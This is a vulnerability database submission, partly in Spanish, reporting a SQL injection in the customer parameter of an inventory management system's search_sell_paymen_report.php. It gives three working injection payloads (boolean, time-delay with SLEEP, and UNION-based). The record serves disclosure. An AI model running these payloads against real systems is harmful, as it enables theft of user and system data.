| Título | SQL injection vulnerability exists in inventory management system |
|---|
| Descripción | SQL injection vulnerability exists in customer parameter of app/ajax/search_sell_paymen_report.php file of inventory management system
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
Payload: customer=1/(3*2-5) AND 8411=8411&issuedate=07/02/2023 - 07/31/2023
or
customer=1/(3*2-5) AND (SELECT 8075 FROM (SELECT(SLEEP(5)))HIim)&issuedate=07/02/2023 - 07/31/2023
or
customer=1/(3*2-5) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626a7071,0x4b626f70496f794d656f69534c586d745652616969506276706c436f42566548787a754247784769,0x7170627071)-- -&issuedate=07/02/2023 - 07/31/2023 |
|---|
| Fuente | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/PUBLIC%20CVE%20HUB/Free%20and%20Open%20Source%20inventory%20management%20system%20-%20vuln%202.pdf |
|---|
| Usuario | wuguanfengyue (UID 52312) |
|---|
| Sumisión | 2023-08-09 07:53 (hace 3 años) |
|---|
| Moderación | 2023-08-20 08:50 (11 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 237558 [SourceCodester Inventory Management System 1.0 search_sell_paymen_report.php Cliente inyección SQL] |
|---|
| Puntos | 20 |
|---|